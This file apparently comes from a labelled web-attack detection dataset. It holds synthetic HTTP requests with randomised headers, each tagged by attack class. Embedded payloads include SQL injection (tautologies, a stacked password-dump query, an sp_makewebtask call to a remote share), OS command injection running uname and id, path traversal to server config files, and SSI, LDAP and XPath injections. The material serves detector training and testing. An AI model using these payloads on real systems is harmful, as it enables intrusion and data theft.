Warning: 305 210.240.173.34 "ntioprsmAicmwedcere" "Sat, 11 Dec 04 18:18:56 UTC"
X-Forwarded-For: 142.48.24.138
X-Serial-Number: 69115
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40597
Start - Id: 42612
class: SqlInjection
GET /bsi/xovnmT5zi.aspx?geyQR77n-4Y-=OR+++++%27iae%27+++++%3D+++%27+++%27 HTTP/1.0
Host: www.0Gweeiir.be
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 105.113.178.254
Cookie: ayqi0m=a3~ d;1qrn=rvZarj3vkgG
Cookie2: $Version="901"
Date: Tue, 14 Jul 09 19:56:47 CET
ETag: W/"dDx574vQD5EHg8r83RQ"
Expect: t9eEetml=oiti
From: seghis@iie1ycjn.net
If-Modified-Since: Sun, 11 Mar 07 20:47:01 GMT
If-Unmodified-Since: Sun, 02 Nov 08 24:08:55 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Jun 04 03:46:25 UTC
Max-Forwards: 8
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Basic ZTZhMjpyOGRzeQ==
Authorization: Digest uri=http://c7pehg.gov/wlTmc5eu/2Atai/meaa/st4lt/bneleeEA.fgf
Referer: /eR0Ewfi/etae1l6a.php4
TE: trailers
Trailer: Warning
User-Agent: Mozilla/1.2 (Machintosh; U; PPC Mac OS X 4.9; ni-rn; rv:4.5.2) Gecko/35439020
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Win95
UA-Pixels: 4720x346
Via: ali/5.1 64.227.232.123, 4.9 www.eicsu.js
Transfer-Encoding: compress
Upgrade: tTeemn/3.0, mb5/6.3, ezf/4.1
Warning: 057 156.192.176.145 "wyseIt" "Mon, 14 Dec 09 05:20:58 UTC"
X-Forwarded-For: 32.163.55.249
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42612
Start - Id: 48486
class: XPathInjection
GET /iXM5Hetu.gif?toe2i=rry4tcservicesnhtpassm&8yXeRNxO-=lr HTTP/1.0
Host: 162.130.97.134:80
Connection: Slipoesd
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: fda31us-ote9, onrreliE-t;q=0.1, Soqt-poEH
Cache-Control: max-age=2
Cookie: L4nu7dzsetq=iaRee9es5gh;;htpasssock_streamvw4WAV9T4=6820;frogiyr=6     or   l/arey/dIsa9/child::node()[position()=25]  or     2=
Cookie2: $Version="258"
Date: Wed, 09 Mar 05 16:23:59 GMT
ETag: W/"U@_bbweQ66JumxK"
If-Modified-Since: Sun, 21 Jun 09 07:32:10 UTC
If-Match: *
Max-Forwards: 32
Pragma: no-cache
Range: 0-977,-38694
Referer: http://www.nJjeue.be/tNUOor/re5hst/4elttlve/oc1ie/tonmsl.asmx
TE: trailers,trailers,deflate
User-Agent: geose/2.4.6
Transfer-Encoding: identity
Upgrade: azokf/9.7
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48486
Start - Id: 43376
class: OsCommanding
GET /c2/ccJVTvBoh/52eeR.A@9UekGp5/tpJECBtyfX8n@Hx/Rai8yhaOsaEasIk/nf9bl_qh4y/hN/Jincludemvbscriptl/tnbeie/cinputQ/aXMlnuvPp7@ry5/idxFBoDVokshttp.bin?cqo2ntae3=++++%3B++echo++++%3B+++w+++++%3B++uname+++-a+++%3B+id&Emnvty0ytmczh=e1qohtkKkc%7C&moy2oe=215397&niqklr6Ssosslh=muf&e6=2xnnttearter HTTP/1.0
Host: 96.118.60.248:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: identity, deflate;q=0.2, gzip;q=0.0, deflate;q=0.7
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 114.35.13.35
Cookie: rdpEu9o=o8rten$at~dyNuhsama
Cookie2: $Version="667"
Date: Wed, 30 Jun 04 08:28:21 GMT
ETag: "t_0bP8amfnwUL9KrdCI"
Expect: aoukreuC
From: utidoe@qznd.net
If-Modified-Since: Mon, 23 Jul 07 06:47:40 CET
If-Unmodified-Since: Wed, 11 Jun 08 23:05:48 UTC
If-Match: "GpOCC_XEdXv367O"
If-None-Match: *
If-Range: "zHHE3.kwA1FIsV0opf"
Max-Forwards: 19
MIME-Version: 2.7
Pragma: jntdishi=r
Proxy-Authorization: Digest uri=http://www.aSgm.net/onpfm.pdf
Authorization: stt7m heees=nnhm3bi
Range: 025-,561060-
Referer: /0oatdo/4ddsk6nn/Mhtn/rIqw/eBsldhia.htm
TE: trailers,trailers
Trailer: Authorization
User-Agent: uceapy/1.8.6.1.7
UA-CPU: Sparc
UA-Disp: 5052,410,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 9788x122
Via: 2.0 215.87.30.126, 1.8 176.214.34.141
Transfer-Encoding: identity
Upgrade: HaT6gy/0.1
Warning: 782 www.e5rte.tiff:876 "07ituthT2yrwlHit1ah" "Sat, 29 Jul 06 07:27:58 CET"
X-Forwarded-For: 17.138.146.187
X-Serial-Number: 68319129
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43376
Start - Id: 42481
class: SqlInjection
GET /spY@Lb/Hq2IUhtUphpM/r6D3i/mKC@eDGSu/HsQ.f9rvtGPr_@_/Zve0xhl/nrtikraeansmah8eb/n@5@LXbi3Zpw__70/tqcbyOaxbgean/mdgnMxhhRhLid0oshcae/sock_streamGaAQzk4saaD.cgi?ohIdnlPmbooue=%40hebimg&HNDE=%27%3B+begin+++++declare+++++%40ret+varchar%288000%29++++set+++%40ret%3D%27%3A%27+++++select+++++%40ret%3D%40ret%2B%27+++++%27%2Bol%2B%27%2F%27%2Bpassword++from++rItac+++where++Om0%3E%40ret++++select++++%40ret+as+ret+++++into+++foo+++++end--&y2olvLfeMse7na=iuBf&ielot=54559&MfhAoa=k-ir3 HTTP/1.1
Host: 134.196.253.167:2867
Connection: keep-alive
Accept: video/*;q=0.2
Accept-Charset: x-mac-icelandic, iso-8859-4, x-mac-hebrew;q=0.3
Accept-Encoding: *;q=0.3
Accept-Language: ts-dr;q=0.4
Cache-Control: max-age=6997
Client-ip: 89.45.12.136
Cookie: ehcfue=csrn
Cookie2: $Version="2"
Date: Thu, 20 Oct 05 08:57:44 GMT
ETag: "ucyTNdNZwmzBEzMRFjR"
Expect: slai
From: sheo@RafNi.uk
If-Modified-Since: Wed, 16 Apr 08 23:24:55 UTC
If-Unmodified-Since: Tue, 01 Jul 08 01:07:24 CET
If-Match: "1VcAmnYoS6YUuknzBeY"
If-None-Match: *
If-Range: Mon, 20 Nov 06 22:13:32 UTC
Max-Forwards: 04
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: tnrr qtclsQSi=e3eg
Authorization: emmed 32haU8=slot
Range: 7-59040
Referer: /dtlvIteg/cnaj/Hjn5edse.asmx
TE: deflate;q=0.5,trailers
Trailer: If-Unmodified-Since
User-Agent: nnilbe (gukYTNOh; r45uIx3@U; oOinMp9_)
UA-CPU: x86
UA-Disp: 1488,9515,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 733x829
Via: HTTP/2.6 www.onoc.tiff, FTP/2.5 11.114.114.134, 4.7 www.rtta.png
Transfer-Encoding: gzip
Upgrade: i9t/0.4, rer/6.1, the/8.5, Dxmt/8.7
Warning: 899 www.i1dtW1t.js:1401 "nerre4v" "Thu, 17 Mar 05 06:33:46 CET"
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 242296099385997
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42481
Start - Id: 45667
class: PathTransversal
GET /ai6.png?7ariyb3=6452024&ye6csUoenre=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat&lnwOleeoA7=fix6t&tteot1WN=tnSe2clQ&fNE2JuKA4Ij8=fymaruti9sauke&eedRtf=gB6BVU&ueosput=rXNz0YjRQS&objectIdpGWUx=n9etsnt1h10ifevarif%5D&kr=709038&le=tppl&cd9hasthoorcbai=mt&frlc=rEc&asckj2pis=1982&4iyH3a=dt&ishtIrwg=62640450 HTTP/1.1
Host: www.lSet.fr
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: *
Accept-Encoding: gzip;q=0.0, compress;q=0.8, identity;q=0.8, identity, identity
Accept-Language: sy-e;q=0.4, df-lAzotH
Cache-Control: max-age=183
Client-ip: 10.24.0.201
Cookie: norAllc==7);bIvugw=0593
Cookie2: $Version="3"
Date: Mon, 28 May 07 15:36:45 CET
ETag: W/"tX@AS.xg2TCYBvC8FMx"
Expect: 100-continue
From: waaAi@m8ebbshnen.org
If-Modified-Since: Sat, 02 Sep 06 05:16:50 CET
If-Unmodified-Since: Wed, 12 Jan 05 14:09:31 GMT
If-Match: *
If-None-Match: *
If-Range: "bGleP.UdyMUqXecdXiZ"
Max-Forwards: 227
MIME-Version: 2.6
Pragma: ufjsii=stg
Proxy-Authorization: Digest cnonce="vhio"
Authorization: Digest nc=84437ae2
Range: -62,101-,55-837
Referer: http://www.zgaeo2mo.st/edahNemi/8tnoh/4s3rmrs.swf
TE: trailers,deflate;q=0.4
Trailer: User-Agent
User-Agent: 7yareMfOoRhni3Fr
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 488x430
Via: FTP/8.7 www.jhee.tiff, 0.3 www.SsMe.jpeg:9
Transfer-Encoding: deflate
Upgrade: au3/0.3, DRlrd/5.7
Warning: 448 89.102.120.71 "cA0lThi" 
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45667
Start - Id: 45488
class: PathTransversal
GET /ec8o9nmiexs/AHt6yreolneweI/oASq_Q2VsUQeDLlP/e-hY6xss6/dds6fortjneL9eetqe/e7n/asBb8.5dFwq0ncb/XURVxhttpconnectXMscript.9.gif?ah9ecdhirennm=9&eadend=httpsl8dabaH%3Aloadmineouhservicesde&st8exeooPT=exswriAt3emha9wi&HfthNvO91ii=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&t1p=rmspyU4oxwP1&aars=nhp&ClI-servicesI.nOvh=aarueTnullfdZbrphprl&ufrka=+fiA&kgTinZG=sEedeleteerE%5Cmocha&2sterab=09fyp HTTP/1.0
Host: 95.109.171.148
Connection: aAhea
Accept: application/*;q=0.2
Accept-Charset: x-mac-chinesesimp;q=0.4, iso-8859-5;q=0.1
Accept-Encoding: identity, identity
Accept-Language: rovsael-yjehNcve
Cache-Control: min-fresh=8
Client-ip: 165.251.254.128
Cookie: anhgba=cLyneoyaatbja;ll=e67uJ
Cookie2: $Version="39"
Date: Thu, 05 Oct 06 14:21:49 UTC
ETag: "SQQiLGzppLASCU-m"
Expect: 100-continue
From: rddIbt@n7reian.st
If-Modified-Since: Sat, 01 Sep 07 04:58:09 CET
If-Unmodified-Since: Sat, 12 Jan 08 14:39:54 UTC
If-Match: "P81d2kSqq7XukJFVE"
If-None-Match: "0y7xbtgN8.-Szri"
If-Range: *
Max-Forwards: 719
MIME-Version: 1.3
Pragma: o8an=ot
Proxy-Authorization: NTLM c2ExZTZ0YWlkZG9MNmxnb2loZWJlb3RzZGJ3UGxscnZ1ZWVlbG9zem5ldG9sZXRo
Authorization: NTLM cnJ0ZWhpc3NwZWFpSWNlcm9BaWVmSGlwb3Q1bXVlYXRhcGxnZWFFYXpyZXNlaWFz
Range: 7-
Referer: http://www.ha2ai.com/tneRdec/ujwue/1mlvm1/eo65ew.zip
TE: trailers
Trailer: Expect
User-Agent: Mozilla/8.8 (Machintosh; U; PPC Mac OS X 2.0; yn-n8; rv:3.6.0) Gecko/36719071
UA-CPU: PowerPC
UA-Disp: 187,4216,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 6084x210
Via: yynna/1.2 www.orzabf.jpg, 1.8 224.216.241.31:4824, FTP/7.4 www.rqisoe.shtml
Transfer-Encoding: identity
Upgrade: drf/1.3, eoe/9.9
Warning: 402 1.54.207.201 "lrklpe" 
X-Forwarded-For: 224.80.9.55
X-Serial-Number: 15968241
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45488
Start - Id: 39074
class: LdapInjection
POST /idchdshb/pl-ljntO3/n.iD/p2htono8leeBRu/nxpl-mRGkYqKWbY57m4/dDd9duoeicheYtEO/rN9FEPK1mL1yX/1Z/ltgM0Dh9mKWA/iUsKnHxRp/echoBa6andi.jsp? HTTP/1.1
Content-Length: 144
Content-Language: ene,im,u8tad
Content-Encoding: identity
Content-Location: http://www.sXvnaeoo.st/oi7nap/iritgei.tiff
Content-MD5: aGl0ZmM4emV1YW52YmFuMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 22 Jul 09 10:50:46 UTC
Last-Modified: Sat, 17 Jun 06 20:55:35 UTC
Host: 112.39.81.114:80
Connection: close
Accept: image/jpeg;q=0.5, text/*;q=0.9, image/*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: deflate, deflate;q=0.9, deflate;q=0.5
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 177.22.162.17
Cookie: wszedlanu9odks1=)   ( |    (displayName=had*)    (name  =    had*    )(    mail=had*  );Htsy=ro0;9shl2h=791;uTt7heiueasT=ahU
Cookie2: $Version="5"
Date: Sun, 14 Jan 07 07:52:44 GMT
ETag: W/"yvzX9iqgrv6V52Mvwhh"
Expect: At1t
From: tr6Rzr@s2NsE.cz
If-Modified-Since: Tue, 08 Sep 09 19:41:56 UTC
If-Unmodified-Since: Sun, 26 Feb 06 18:02:39 CET
If-Match: *
If-None-Match: "BjXRteLw@pDFMNxZvl"
If-Range: Wed, 04 Feb 04 05:09:49 CET
Max-Forwards: 44
MIME-Version: 6.6
Pragma: Re9i=8x
Proxy-Authorization: Digest realm
Authorization: NTLM dGVhZHRlT2luaWVoZXdUb2VoaWVFSWlkZXNpWGkyaDNn
Range: -798,89211-,080300-12
Referer: /ya2eh/snha/toetDclo/kltjzes.nsf
TE: deflate,deflate,gzip;q=0.5
Trailer: If-Match
User-Agent: Mozilla/4.9 (Machintosh; U; PPC 1.2; hd-e6; rv:4.2.4) Gecko/70411910
UA-CPU: 68000
UA-Disp: 5522,0953,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 427x4997
Via: 4.8 www.arn9yoYt.tiff, erim/2.1 214.55.9.71, HTTP/4.7 209.31.145.51
Transfer-Encoding: gzip
Upgrade: Icn0ei/9.6, oNoee3/0.6
Warning: 501 153.128.78.115 "u0sVnonhteciephaIirh" "Sat, 27 Nov 04 10:59:13 GMT"
X-Forwarded-For: 88.195.233.172
X-Serial-Number: 53018392304378
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

xL0JkcatDarFx=aelj-&etef7tv6hereum5=51&200wep0pighOr=som2tvgagaselhnw&ig=7&xear=U9zldvn9rvocnm&St3PLP-HKmzY=fromsSfsaartlietha&UhtpassGrmQQDS=23

End - Id: 39074
Start - Id: 40661
class: SSI
GET /ncD535tPOV/9sqVvVBJN/yl/eajzKI/lSO/sgrdh/rogDb842zMh/lxmll8UNZHpm5FejX.bin?ge3x8esr51seri=pki2iframertlib&sedhcyhw6e7qEl=84260742&sueu=aasndiifxDcb47aI&UcCorinseaaae8e=2&mesiteiirhehnb=048971&3hnQ8_=nPQ7qt-k9gq&5deooytEea=42941777&zb7ia=wiparvtethdfno1eso&ets=03509410&mttysucm9e=s%25irm&lhnmo=9%2Bin&sEnentolUwn=sda%28cw%25oaixdiva+b&criea=%3C%21--+++++%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&4towaeeAj5=fa HTTP/1.0
Host: www.VaeashbTt.cz:2277
Connection: coymii4
Accept: video/mpeg, application/zip
Accept-Charset: iso-8859-6, x-mac-greek
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 248.142.217.61
Cookie: aed4spv0=851673;i7ho4zheozn=dLP5;udlSab=nLxGNpNd3;QRBycl@2m=To0tdie
Cookie2: $Version="81"
Date: Thu, 16 Apr 09 23:01:03 UTC
ETag: "ZSKP9aGFodSxvsTRK"
Expect: 100-continue
From: 4dtnvda@6tnlilE.st
If-Modified-Since: Fri, 09 Jan 09 02:28:31 GMT
If-Unmodified-Since: Fri, 10 Sep 04 24:39:59 UTC
If-Match: "JdRWOnDm@sUJL3pYTs"
If-None-Match: "5vRZt@-UWRardWndzh8m"
If-Range: Tue, 18 Mar 08 18:45:07 UTC
Max-Forwards: 994
MIME-Version: 1.3
Pragma: sl=nG
Authorization: Digest response="ed7AEE2Cc42Fe2495bC9F11F516d1caE"
Referer: /bcaiee/infhy/ed9ur/tge9.asp
TE: deflate,trailers,chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.6 (Windows; U; Windows NT 6.7; de-dk; rv:2.8.0) Gecko/29218050
UA-CPU: 68000
UA-Disp: 574,0063,16
UA-Color: color32
Via: e8sord/7.3 www.s9nrlLgi.tiff, ayanoe/8.2 181.132.36.103
Transfer-Encoding: olnood
Upgrade: risQna/2.8, sooR/8.6, loin/4.5, Eydro/8.2, Hdic/5.8
X-Forwarded-For: 151.45.186.240
X-Serial-Number: 9147662078106
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40661
Start - Id: 41714
class: SqlInjection
GET /hvzd9dtluVK.h4kSeh/i8ho.mspx?snuagyrtrmBuBne=43288582&aGsniN=eedxecmtae&wX9mailFNrOusrtS=%27++++OR++%27%27++%3D+++%27 HTTP/1.1
Host: www.tprni64do.cz
Connection: ehsbsS
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-store
Client-ip: 60.67.60.69
Cookie: re3Tsaeoi=b=
Cookie2: $Version="7"
Date: Wed, 28 Jul 04 06:01:23 UTC
ETag: W/"jExUKKMSBj7ISjAY"
Expect: paem=jatrS32;hyrdbn
From: daatsa@4adiaM.fr
If-Modified-Since: Sat, 01 Sep 07 09:49:32 UTC
If-Unmodified-Since: Sun, 20 Jul 08 02:42:07 UTC
If-Match: "GlBGxIFWRYIOYCD4w"
If-None-Match: *
If-Range: *
Max-Forwards: 64
MIME-Version: 9.0
Pragma: 2e=jaU4n
Proxy-Authorization: Digest nc=B6e30dfE
Authorization: euni 4arbhzM=tnrh
Range: 864538-4,42725-309719
Referer: http://rr9loc.gov/hrTm.asmx
TE: trailers,chunked
Trailer: Via
User-Agent: enauiaoYie/9.8.4.0
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5958x694
Via: hao/9.9 www.efgn.shtml, 9.3 www.cenn.js
Transfer-Encoding: ltae
Upgrade: er1tt/1.6, mxcea/2.3, tute7/7.3
Warning: 916 www.eheltm.css "rn5mT" 
X-Forwarded-For: 152.105.208.9
X-Serial-Number: 611965021882313
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41714
Start - Id: 40985
class: SqlInjection
GET /to/aRM.edaM26J/9C/tazeif9lkltiqnnv/v08binrcpfH9jfinsertOkFs/i6NZcPDf_760YN4Pgq5/SSM0ahtaccesy/g1rtevo/os.htm?slibr21CJ=e&keneee=s3Qj HTTP/1.1
Host: www.1we6.st
Connection: ct48
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cookie: agUtre=';  EXEC     master..sp_makewebtask  "\\153.142.153.244\eu2y9w\uEwLy.tiff",   "SELECT *    FROM  INFORMATION_SCHEMA.TABLES";Ddelahtnce8r=Efc%t+se-e0B7having3%smr
Cookie2: $Version="21"
Date: Wed, 19 Jan 05 24:27:32 GMT
ETag: W/"4WtVXjLUOOMiNibMuY4F"
Expect: 6enrOtd=oupatpE
If-Match: *
If-None-Match: "UetgTn2h83d45Lbx"
If-Range: Sun, 03 Aug 08 12:51:38 UTC
Max-Forwards: 0
Pragma: no-cache
Authorization: ccsEug 89otoneM=onto
Range: 657310-
Referer: http://enAaem.it/eefb/neYNii/tepe/ncea7.nsf
TE: deflate
User-Agent: iIzoEdcah
UA-Disp: 945,632,16
Via: HTTP/5.2 www.Tcev0g.html
Transfer-Encoding: tw3tnw; eoNaeeh=inoe
Warning: 085 www.stl7an.jpeg "efnn" "Sat, 18 Aug 07 07:29:46 GMT"

null

End - Id: 40985
Start - Id: 36355
class: PathTransversal
GET /varstcsssO7.gif?4nadi=7iiotntePOtnoieed&hew=%2Fetc%2Fhttpd%2Fhttpd.conf HTTP/1.1
Host: 55.125.174.107:88
Connection: s7neti
Accept: image/*;q=0.9, audio/basic;q=0.7, image/png;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=854
Client-ip: 102.199.117.40
Cookie: hlOtpsaewh7re57=1299271;gWmhUg=242398838;l8e9tehhiyhie=i~hsopt[a0d|ev;dFEQLlLAMk=ebtSntrq;1Z5Sncx23VeQ@=er+;lhqiGTh1r=r%8)ies
Cookie2: $Version="14"
Date: Tue, 09 Jun 09 09:07:28 CET
ETag: "9R0VecNaYF8anlD5"
Expect: 100-continue
From: sotSFlSe@qiksat.biz
If-Modified-Since: Wed, 19 Mar 08 14:19:50 CET
If-Unmodified-Since: Sun, 02 Mar 08 05:20:53 GMT
If-Match: "ZZKNmk7E5@hKVdxm"
If-None-Match: *
If-Range: "JipMFmiMMaLo9Elqk"
Max-Forwards: 7117
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Basic YXVJbnM6ZWhpcjFndHU=
Authorization: Basic eHNkZWR1Ymk6Y3RhUg==
Range: 75-618834,757-411,77394-267269
Referer: http://www.nyStta.cz/irjahlth.mspx
TE: trailers,trailers
Trailer: From
User-Agent: nara/0.4
UA-CPU: MIPS
UA-Disp: 7628,9010,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 636x8824
Via: HTTP/9.8 www.xjod6ef5.gif:0461
Transfer-Encoding: deflate
Upgrade: T8m/5.2, fg1ie/5.0, hrhh/0.4
Warning: 752 195.16.67.206 "ehmsasmiiyniOokn" 
X-Forwarded-For: 217.52.49.74
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36355
Start - Id: 48840
class: XPathInjection
GET /huIfdwxfPl/BbzL9.pl?ksjnoes=hg%27+++or+++++se%2Fdiso%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D28%5D++or+++++%27Ufkt%27++++%3D+%27&srh=5683917&uzSaaa=rSsystemm&ca7cs9ewdt=E&mrn8wibn=%27slp HTTP/1.1
Host: 233.54.137.81:80
Connection: a6ee
Accept: video/mpeg;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 232.170.36.208
Cookie: ds=154691665;argtekrereru4=lpassthru=r2soesooe
Cookie2: $Version="856"
Date: Fri, 26 Feb 10 06:54:05 CET
ETag: W/"s1nAJhbcwjAVIi4AY"
Expect: rrlahos
From: w2h3rar@tkko9pi.org
If-Modified-Since: Thu, 08 Apr 04 17:47:07 CET
If-Unmodified-Since: Wed, 11 Mar 09 14:52:48 CET
If-Match: *
If-None-Match: "MYK_W5h39RoLIMb"
If-Range: Sat, 07 May 05 01:17:23 UTC
Max-Forwards: 984
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM bmVpVHByZTAwRm5lZWNvZWIwc2hyU2pzQW5wZmV0cmVzZW9yZWFlZ2FPZXIw
Authorization: iuut ieiRnfr=Svncz
Range: 5-03627
Referer: http://refdbzo.biz/ptisetl/oe7aod.tar
TE: trailers,gzip;q=0.4
Trailer: Accept-Charset
User-Agent: eTidua6L http://www.srenebi.it
UA-CPU: StrongARM
UA-Disp: 5906,9544,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0867x2824
Via: HFm5le/8.8 113.71.180.99, fst/2.5 183.140.81.118:0991, FTP/6.4 224.177.93.123
Transfer-Encoding: deflate
Upgrade: qdiue/5.0
Warning: 633 188.14.137.244 "aosw5Aneiu" 
X-Forwarded-For: 239.247.179.124
X-Serial-Number: 177199337529573688
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 48840
Start - Id: 48703
class: XPathInjection
PUT /sdsnhcsre3c/Hnifh2ck.gif? HTTP/1.1
Content-Length: 143
Content-Language: qtofeat,Loejnow
Content-Encoding: deflate
Content-Location: /Snspgits/lrst7g.nsf
Content-MD5: MWU5bGxBWmNYb2hvc2U5YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 26 Nov 08 10:11:10 GMT
Last-Modified: Mon, 30 Nov 09 03:23:19 GMT
Host: 84.183.23.71
Connection: S0TB
Accept: video/mpeg, application/x-tar
Accept-Charset: x-mac-roman
Accept-Encoding: compress;q=0.6, identity;q=0.7, gzip;q=0.1, gzip
Accept-Language: betem-fsxb;q=0.5
Cache-Control: max-stale=9488
Client-ip: 159.42.128.3
Cookie: huuae=bosexect;cat7rVha4=taem t6 T3;@Wx0c=~6techoleisucst0insertrIhttpsalr;Eorr= ie tshobhcV
Cookie2: $Version="5"
Date: Thu, 13 Oct 05 07:08:47 CET
ETag: "iRPx-vhsrn5IOB4F@6ra"
Expect: 100-continue
From: atds@noHasdc.cz
If-Modified-Since: Sun, 05 Nov 06 01:55:38 GMT
If-Unmodified-Since: Wed, 23 Sep 09 22:30:20 GMT
If-Match: *
If-None-Match: "wjgX@SBRvJhk.LIdy"
If-Range: Fri, 30 Apr 10 21:58:05 GMT
Max-Forwards: 842
MIME-Version: 7.4
Pragma: s2ei='Hh'
Proxy-Authorization: Digest realm
Authorization: Basic ZnBnd3Q6b25sZVg=
Range: 522185-0,03103-
Referer: http://www.3xYo.it/K4SteMri/mLoe3/Sjeiiyp.png
TE: deflate;q=0.7,deflate;q=0.0,chunked
Trailer: Expect
User-Agent: conrqb (l4hdBd; esliNjne-; tqwIYU8qjE; a6JREzs4I; hHcnQpeL)
UA-CPU: Sparc
UA-Disp: 2550,506,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 640x9904
Via: HTTP/0.7 16.101.160.147, 4.3 www.feteocs.css, HTTP/4.6 www.8nuTd.tiff:45862
Transfer-Encoding: osspud
Upgrade: phe/8.1, Jtnat/6.7
Warning: 956 www.8Oqk.shtml:3 "dhfeiV6ltr" 
X-Forwarded-For: 231.51.107.90
X-Serial-Number: 70312364698710750668
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

gar=sn/aoq/wmu5/child::node()[position()=17]    or     'Hnnr7it'  =    '&3ciseGyftxti=e0d&eensnnddHgtdiE=902826

End - Id: 48703
Start - Id: 35740
class: XPathInjection
GET /9oo/6eiooastr9rrNe.css?tmt2t0eIrttT=etue&S0s6o=2236937&actrneric9a8t=039&rrcesp=mcedAdt%27%5D+++%7C++P+%7C+++++%2F%2Fuser%5B++++name%2Ftext%28++++%29++++%3D+++%27rdf&roncoasnojn7tnn=cDhXk&8zteMsmtNjim1n=mlE1ei0ltssWog HTTP/1.1
Host: 63.200.232.176
Connection: neneaea
Accept: */*;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.3, identity;q=0.0, gzip
Accept-Language: *;q=0.8
Cache-Control: hocm='sUDtvjr'
Client-ip: 15.64.70.130
Cookie: Lsten9AaTR=brtdrf
Cookie2: $Version="4"
Date: Fri, 30 Dec 05 04:33:58 GMT
ETag: "UQRCXM-rpuSyTChl2N"
Expect: 100-continue
From: dkgpi@e0eolroeA.ch
If-Modified-Since: Wed, 24 Jan 07 14:49:37 CET
If-Unmodified-Since: Tue, 06 Jul 04 17:21:50 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest username="ta7oAu"
Authorization: Digest nonce
Range: 820401-
Referer: http://yssa.ch/prwse/ieea0Nt.jsp
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Mozilla/2.9 (Windows; U; WinNT 6.6; Nf-ru; rv:7.1.5) Gecko/11239607
UA-CPU: x86
UA-Disp: 453,3007,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 161x6887
Via: HTTP/2.9 238.151.124.125:922, 5.1 186.4.76.150, oei1/2.5 167.218.76.220
Transfer-Encoding: erVai1; acTte7lz=n3ys
Upgrade: 7ln/1.2, hsmh/6.3, ueo/9.6, 4r6eM7/9.5
Warning: 830 150.180.170.121 "g2fnareaRtt4gNB1gprl" 
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 7969287836637200
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35740
Start - Id: 49034
class: XPathInjection
